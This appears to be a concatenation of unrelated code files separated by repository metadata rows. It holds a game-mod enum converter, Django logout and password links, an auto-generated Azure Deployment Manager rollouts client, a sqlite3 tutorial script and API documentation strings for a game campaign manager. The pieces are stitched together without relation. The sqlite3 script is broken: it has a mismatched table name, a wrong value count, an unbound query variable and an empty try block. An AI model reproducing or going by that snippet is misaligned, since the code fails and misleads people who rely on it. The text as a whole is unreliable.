STATISTIC: 'CommonFundsSource' = ...
BUCKS: 'CommonFundsSource' = ...
NO_SOURCE: 'CommonFundsSource' = ...
@staticmethod
def convert_to_vanilla(value: 'CommonFundsSource') -> FundsSource:
"""convert_to_vanilla(value)
Convert a value into the vanilla FundsSource enum.
:param value: An instance of the enum.
:type value: CommonFundsSource
:return: The specified value translated to FundsSource or HOUSEHOLD if the value could not be translated.
:rtype: Union[FundsSource, None]
"""
mapping: Dict[CommonFundsSource, FundsSource] = {
CommonFundsSource.HOUSEHOLD: FundsSource.HOUSEHOLD,
CommonFundsSource.RETAIL: FundsSource.RETAIL,
CommonFundsSource.BUSINESS: FundsSource.BUSINESS,
CommonFundsSource.STATISTIC: FundsSource.STATISTIC,
CommonFundsSource.BUCKS: FundsSource.BUCKS,
CommonFundsSource.NO_SOURCE: FundsSource.NO_SOURCE,
}
return mapping.get(value, FundsSource.HOUSEHOLD)
@staticmethod
def convert_from_vanilla(value: FundsSource) -> 'CommonFundsSource':
"""convert_from_vanilla(value)
Convert a vanilla FundsSource to value.
:param value: An instance of the enum.
:type value: FundsSource
:return: The specified value translated to CommonFundsSource or HOUSEHOLD if the value could not be translated.
:rtype: CommonFundsSource
"""
mapping: Dict[FundsSource, CommonFundsSource] = {
FundsSource.HOUSEHOLD: CommonFundsSource.HOUSEHOLD,
FundsSource.RETAIL: CommonFundsSource.RETAIL,
FundsSource.BUSINESS: CommonFundsSource.BUSINESS,
FundsSource.STATISTIC: CommonFundsSource.STATISTIC,
FundsSource.BUCKS: CommonFundsSource.BUCKS,
FundsSource.NO_SOURCE: CommonFundsSource.NO_SOURCE,
}
return mapping.get(value, CommonFundsSource.HOUSEHOLD)
| [
"[email protected]"
]
| |
7fd63d245dbd1ed1b3c96be002435fe20c90baf8 | 44bbfe1c9a7f16e632cdd27c2de058033b33ea6d | /mayan/apps/authentication/links.py | dc7385bd9ff9101a3656851017b7786194679579 | [
"Apache-2.0"
]
| permissive | lxny2004/open-paperless | 34025c3e8ac7b4236b0d8fc5ca27fc11d50869bc | a8b45f8f0ee5d7a1b9afca5291c6bfaae3db8280 | refs/heads/master | 2020-04-27T04:46:25.992405 | 2019-03-06T03:30:15 | 2019-03-06T03:30:15 | 174,064,366 | 0 | 0 | NOASSERTION | 2019-03-06T03:29:20 | 2019-03-06T03:29:20 | null | UTF-8 | Python | false | false | 478 | py | from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Link
def has_usable_password(context):
return context['request'].user.has_usable_password
link_logout = Link(
icon='fa fa-sign-out', text=_('Logout'), view='authentication:logout_view'
)
link_password_change = Link(
condition=has_usable_password, icon='fa fa-key', text=_('Change password'),
view='authentication:password_change_view'
)
| [
"[email protected]"
]
| |
6e6be05f168d51c04778758cfdbef7aef1c73390 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/deploymentmanager/azure-mgmt-deploymentmanager/azure/mgmt/deploymentmanager/aio/operations/_rollouts_operations.py | 3e790f1835a9d269c5154a3a56505a1fc12ed757 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
]
| permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 23,787 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RolloutsOperations:
"""RolloutsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.deploymentmanager.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _create_or_update_initial(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> "_models.RolloutRequest":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if rollout_request is not None:
body_content = self._serialize.body(rollout_request, 'RolloutRequest')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> AsyncLROPoller["_models.RolloutRequest"]:
"""Creates or updates a rollout.
This is an asynchronous operation and can be polled to completion using the location header
returned by this operation.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param rollout_request: Source rollout request object that defines the rollout.
:type rollout_request: ~azure.mgmt.deploymentmanager.models.RolloutRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RolloutRequest or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.deploymentmanager.models.RolloutRequest]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
rollout_name=rollout_name,
rollout_request=rollout_request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def get(
self,
resource_group_name: str,
rollout_name: str,
retry_attempt: Optional[int] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Gets detailed information of a rollout.
Gets detailed information of a rollout.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param retry_attempt: Rollout retry attempt ordinal to get the result of. If not specified,
result of the latest attempt will be returned.
:type retry_attempt: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if retry_attempt is not None:
query_parameters['retryAttempt'] = self._serialize.query("retry_attempt", retry_attempt, 'int')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> None:
"""Deletes a rollout resource.
Only rollouts in terminal state can be deleted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def cancel(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> "_models.Rollout":
"""Stops a running rollout.
Only running rollouts can be canceled.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.cancel.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/cancel'} # type: ignore
async def restart(
self,
resource_group_name: str,
rollout_name: str,
skip_succeeded: Optional[bool] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Restarts a failed rollout and optionally skips all succeeded steps.
Only failed rollouts can be restarted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param skip_succeeded: If true, will skip all succeeded steps so far in the rollout. If false,
will execute the entire rollout again regardless of the current state of individual resources.
Defaults to false if not specified.
:type skip_succeeded: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.restart.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip_succeeded is not None:
query_parameters['skipSucceeded'] = self._serialize.query("skip_succeeded", skip_succeeded, 'bool')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/restart'} # type: ignore
async def list(
self,
resource_group_name: str,
**kwargs: Any
) -> List["_models.Rollout"]:
"""Lists the rollouts in a resource group.
Lists the rollouts in a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of Rollout, or the result of cls(response)
:rtype: list[~azure.mgmt.deploymentmanager.models.Rollout]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.Rollout"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('[Rollout]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts'} # type: ignore
| [
"[email protected]"
]
| |
26f57305b55d3b30eaa55261b2928f5dc17ece1b | b8ee76250770ba628b818a26b6f894347ff2e390 | /Sqlite3Module.py | f3dd02adf33ac2df83d79a9fb702b4e8d11bbb8e | []
| no_license | SimonGideon/Journey-to-Pro | 77c77bd1a5de387c41bc8618100bbb3957d15706 | 1591310891c7699710e992fe068b8fa230ac3d56 | refs/heads/master | 2023-04-28T19:31:53.155384 | 2021-05-18T19:18:32 | 2021-05-18T19:18:32 | 358,926,411 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import sqlite3
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
# Create a table
c.execute('''CREATE TABLE stocks(date text, trans text, symbol text, qty real, price real)''')
# Insert a raw of data.
c.execute("INSERT INTO stock VALUES ('2006-01-05','BUY','RHAT',100,35,14)")
conn.commit()
conn.close()
# Getting Values from the db and error handling.
import sqlite3
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
c.execute("SELECT * from table_name where id=cust_id")
for row in c:
print(row)
# To fetch mathching.
print(c.fetchone())
# For mutiple row.
a=c.fetchall()
for row in a:
print(row)
try:
except sqlite3.Error as e:
print("An error occured:", e.args[0]) | [
"[email protected]"
]
| |
9bad8400dbafa3c00fcaf4ba4085dc262f62207b | 7b3743f052da9a74808b7d2145418ce5c3e1a477 | /v2/api.thewatcher.io/api/docs/private.py | 5f68768247fe15338ab8d818e23743055fb70ded | [
"MIT"
]
| permissive | quebecsti/kdm-manager | 5547cbf8928d485c6449650dc77805877a67ee37 | a5fcda27d04135429e43a21ac655e6f6acc7768e | refs/heads/master | 2020-11-26T19:22:53.197651 | 2019-10-22T20:53:40 | 2019-10-22T20:53:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,331 | py | authorization_token_management = {
"authorization_check": {
"name": "/authorization/check",
"desc": """\
<p><b>GET</b> or <b>POST</b> to this endpoint to determine if your Authorization
header is still valid or if it has expired.</p>""",
},
"authorization_refresh": {
"name": "/authorization/refresh",
"desc": """\
<p> Use the standard 'Authorization' header and <b>POST</b> an empty request to
this route to recieve a new Auth token based on the previous one.</p>
<p> On the back end, this route reads the incoming 'Authorization' header and,
even if the JWT token is expired, will check the 'login' and 'password' (hash)
keys: if they check out, you get a 200 and a brand new token.</p>
<p> Finally, the KDM API does NOT use refresh tokens (it just feels like
overkill, you know?).</p>\
"""
},
}
administrative_views_and_data = {
"admin_view_panel": {
"name": "/admin/view/panel",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Access the API Admin panel. Uses HTTP basic auth (no cookies/no sessions)
and requires a user have the 'admin' bit flipped on their user.</p>
""",
},
"admin_get_user_data": {
"name": "/admin/get/user_data",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Retrieves a nice, juicy hunk of JSON re: recent users of the API.</p>
""",
},
"admin_get_logs": {
"name": "/admin/get/logs",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Dumps the contents of a number of system logs from the local filesystem where
the API is running and represents them as JSON.</p>
""",
},
}
user_management = {
"user_get": {
"name": "/user/get/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the user who owns <user_id>,
to include some additional usage and meta facts about that user.</p>
<p>Like many of the <code><b>GET</b></code> routes supported by the KD:M API,
this route will return user info whether you use <code><b>POST</b></code> or
any other supported method.</p>
""",
},
"user_dashboard": {
"name": "/user/dashboard/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>This fetches a serialized version of the user that includes the
<code>/world</code> output as well as a bunch of info about the
user, including their friends, settlements they own or are
playing in, etc.</p>
<p>Here's a run-down of the key elements:</p>
<pre><code>{
"is_application_admin": true,
"meta": {...},
"user": {...},
"preferences": [...],
"dashboard": {
"campaigns": [...],
"settlements": [...],
},
}</code></pre>
<p>The top-level <code>dashboard</code> element includes two arrays:
<code>campaigns</code> and <code>settlements</code>.</p>
<p>The <code>campaigns</code> array is a <b>reverse-chronological</b> list
of OIDs of all settlements where the user owns a survivor (i.e.
the survivor's <code>email</code> attribute matches the users
<code>login</code> attribute.</p>
<p>This list can include settlements owned/created by other users:
the basic idea behing the <code>campaigns</code> list is that
you probably want to show these settlements to the user when they
sign in or when they choose which settlement they want to view.</p>
<p>The <code>campaigns</code> array <u>does not</u> include any
'abandoned' settlements (i.e. any settlement with a Boolean True
value for the <code>abandoned</code> attribute.</p>
<p>See <a href="/#settlementAbandon"><code>/settlement/abandon/oid</code>
(below)</a> for more on abandoning a settlement. </p>
<p>Conrastively, the <code>settlements</code> array is a
<b>chronologically</b> sorted list of all settlement OIDs that belong
to the current user, whether abandoned or not.</p>
<p>This is more of an archival/historical sort of list, meant to
facilitate that kind of view/list/UX.</p>
""",
},
"user_set": {
"name": "/user/set/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p>This route supports the assignment of user-specified key/value
attributes to the user object.</p><p>To set an attribute, include
JSON in the body of the request that indicates the key/value to set.</p>
Supported attribute keys include:
<table class="embedded_table">
<tr><th>key</th><th>value</th></tr>
<tr>
<td>current_settlement</td>
<td class="text">
OID of an existing,non-removed settlement.
</td>
</tr>
</table>
Use multiple key/value pairs to set multiple attributes in a single
request, e.g. <code>{"current_settlement": $oid, "current_session":
$oid}</code>
</p>
<p><b>Important!</b> This route does not support the assignment of
arbitrary keys and will completely fail any request that includes
unsupported keys!</p>
""",
},
"user_set_preferences": {
"name": "/user/set_preferences/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p><b>POST</b> a list of hashes to this endpoint to set user preferences.</p>
<p>Your list has to be named <code>preferences</code> and your
hashes have to be key/value pairs where they key is a valid
preferences handle and the key is a Boolean:</p>
<code>{preferences: [{handle: "beta", value: true}, {...}]}</code>
<p>Since this is mostly a sysadmin/back-of-house kind of route,
it fails pretty easily if you try to <b>POST</b> something it doesn't
like. The good news, is that it should fail pretty descriptively.</p>
""",
},
"user_add_expansion_to_collection": {
"name": "/user/add_expansion_to_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p>You can <b>POST</b> a single expansion handle to this endpoint
to add it to a user's collection of expansions:</p>
<code>{handle: "manhunter"}</code>
""",
},
"user_rm_expansion_from_collection": {
"name": "/user/rm_expansion_from_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p><b>POST</b> some basic JSON to this endpoint to remove an expansion handle
from a user's collection:</p>
<code>{handle: "flower_knight"}</code>
""",
},
}
create_assets = {
"new_settlement": {
"name": "/new/settlement",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Use 'handle' values from the <code>/game_asset/new_settlement</code>
route (see above) as params, like this:</p>
<code><pre>{
"campaign": "people_of_the_lantern",
"expansions": ["dung_beetle_knight", "lion_god"],
"survivors": ["adam", "anna"],
"name": "Chicago",
"special": ["create_first_story_survivors"]
}</pre></code>
<p>If successful, this route returns a serialized version of the new settlement,
including its OID, as JSON.</p>
<p>The following <code>special</code> values are supported by the API:</p>
<table class="embedded_table">
<tr><th>value</th><th>result</th></tr>
<tr>
<td class="key">create_first_story_survivors</td>
<td class="value">Creates two male and two female survivors,
assigns them names and places Founding Stones and Cloths in
Settlement Storage.</td>
</tr>
<tr>
<td class="key">create_seven_swordsmen</td>
<td class="value">Creates seven random survivors with the
'Ageless' and Sword Mastery A&Is. </td>
</tr>
</table>
<p><b>Important!</b> Unsupported <code>special</code> values are ignored.</p>\
""",
},
"new_survivor": {
"name": "/new/survivor",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>This works differently from <code>/new/settlement</code> in
a number of significant ways.</p>
<p> In a nutshell, the basic idea here is that the only required key
in the JSON you <b>POST</b> to this route is an object ID for the settlement
to which the survivor belongs:</p>
<code>{'settlement': '59669ace4af5ca799c968c94'}</code>
<p> Beyond that, you are free to supply any other attributes of the
survivor, so long as they comply with the data model for survivors.</p>
<p> Consult the <a href="/#survivorDataModel">Survivor Data Model (below)</a> for a
complete reference on what attributes of the survivor may be set at
creation time.</p>
<p>As a general piece of advice, it typically makes more sense to
just initialize a new survivor with defaults and then operate on it
using the routes below, unless you're doing something inheritance.</p>
<p>For normal inheritance, simply <b>POST</b> the OID's of one or
more of the survivor's parents like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff'}</code>
<p>...or like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f'}</code>
<p>This will cause normal inheritance rules to be triggered when the
new survivor is created.</p>
<p>In order to trigger conditional or special inheritance, e.g. where
an innovation requires the user to select a single parent as the donor,
you <u>must</u> specify which parent is the donor using the <code>
primary_donor_parent</code> key and setting it to 'father' or 'mother':</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5c
a11240f519f', primary_donor_parent: 'father'}</code>
<p>This will cause normal inheritance rules to be triggered when the
new survivor is created.</p>
<p>In order to trigger conditional or special inheritance, e.g. where
an innovation requires the user to select a single parent as the donor,
you <u>must</u> specify which parent is the donor using the <code>
primary_donor_parent</code> key and setting it to 'father' or 'mother':</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f', primary_donor_parent: 'father'}</code>
<p>This will cause innovations such as <b>Family</b> to use the primary
donor parent to follow one-parent inheritance rules for that innovation.</p>
<p>As of API releases > 0.77.n, survivors can be created with an avatar.
Inclde the <code>avatar</code> key in the <b>POST</b> body, and let
that key's value be a string representation of the image that should
be used as the survivor's avatar.</p>
<p>(<a href="/#setAvatarAnchor">See <code>/survivor/set_avatar/<oid></code> route below</a> for more
information on how to post string representations of binary content.</p>
<p><b>Important!</b>Just like the <code>/new/settlement</code> route,
a successful <b>POST</b> to the <code>/new/survivor</code> route will return
a serialized version (i.e. JSON) of the new survivor, complete with
